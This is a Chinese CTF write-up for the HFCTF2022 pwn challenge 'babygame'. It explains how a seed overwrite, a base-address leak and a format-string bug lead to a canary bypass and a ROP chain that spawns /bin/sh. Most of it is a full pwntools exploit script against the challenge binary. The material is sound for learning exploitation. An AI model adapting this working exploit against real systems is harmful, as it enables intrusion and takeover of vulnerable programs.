-
-
[原创]【HFCTF2022】babygame
-
2022-4-28 18:28 12358
-
学到的知识
(1)调用函数和被调用函数的canary的值是一样的
(2)fmt需要事先在栈上设置修改位置
1.babygame
保护
ida
main
从栈帧中可以看出srand的seed———v5是可以被我们覆盖而修改的,那么我们可以外接linux(windows和linux对同样的seed跑出的随机不太一样)上跑好的随机数达到绕过随机数检测的目的
不仅如此,栈上还放了一些残留的进程,我们可以利用这个来leak进程的基地址
game
简单的绕过随机数,攻防世界的入门题了属于是
gold_finger
明显的字符串格式化漏洞,可以用它泄露libc,canary和fmt修改栈上内容(返回地址啥的)
利用思路
通过金手指泄露libc和canary,同时fmt修改返回地址为main函数,然后main函数里面填补canary的同时栈溢出进行rop
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 | #encoding: utf-8 2 #!/usr/bin/python import sys from pwn import * from LibcSearcher import * from pwnlib.util.iters import mbruteforce from hashlib import sha256 import base64 context.log_level = 'debug' context.arch = 'amd64' context.os = 'linux' def proof_of_work(sh): sh.recvuntil( " == " ) cipher = sh.recvline().strip().decode( "utf8" ) proof = mbruteforce( lambda x: sha256((x).encode()).hexdigest() = = cipher, string.ascii_letters + string.digits, length = 4 , method = 'fixed' ) sh.sendlineafter( "input your ????>" , proof) def z(): gdb.attach(r) r = process( './babygame' ) libc = ELF( './libc-2.31.so' ) ##leak_proc_base pd = 0x108 * 'a' + 0x30 * 'a' + 'nameless' + 'nameless' r.sendafter( "Please input your name:" ,pd) r.recvuntil( 'namelessnameless' ) elfbase = u64(r.recv( 6 ).ljust( 8 , '\x00' )) - 0x1465 log.info( 'elfbase:' + hex (elfbase)) ##set read_addr = elfbase + 0x14B6 ##dao_ru_random f = open ( 'test' , 'r' ) a = [ '0' ] * 100 for i in range ( 0 , 100 ): line = f.readline() line = line[: - 1 ] a[i] = str (line) f.close() count = 1 for i in range ( 0 , 100 ): r.recvuntil( 'round ' + str (count)) if a[i] = = '1' : r.sendline( '2' ) if a[i] = = '2' : r.sendline( '0' ) if a[i] = = '0' : r.sendline( '1' ) count = count + 1 ##golden_finger pd = '%27$p%35$p' pd + = '%{}c%11$hn' . format ((read_addr & 0xffff ) - 32 ) pd = pd.ljust( 0x28 , '\x00' ) + '\x68' r.sendafter( "Good luck to you.\n" ,pd) libcbase = int (r.recv( 14 ), 16 ) - (libc.sym[ 'atoi' ] + 20 ) canary = int (r.recv( 18 ), 16 ) log.success( 'libcbase:' + hex (libcbase)) log.success( 'canary:' + hex (canary)) log.success( 'read_addr:' + hex (read_addr)) ##set system = libcbase + libc.sym[ 'system' ] pdt = libcbase + 0x23b72 ##pop_rdi_ret ret = libcbase + 0x22679 bin_sh = libcbase + libc.search( '/bin/sh\x00' ). next () rop = p64(pdt) + p64(bin_sh) + p64(ret) + p64(system) pd = ( 0x120 - 0x18 ) * 'a' + p64(canary) + 0x18 * 'a' + rop ##z() r.sendafter( "Please input your name:" ,pd) r.sendlineafter( 'round' , str ( 1 )) r.interactive() |
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
谁下载
看原图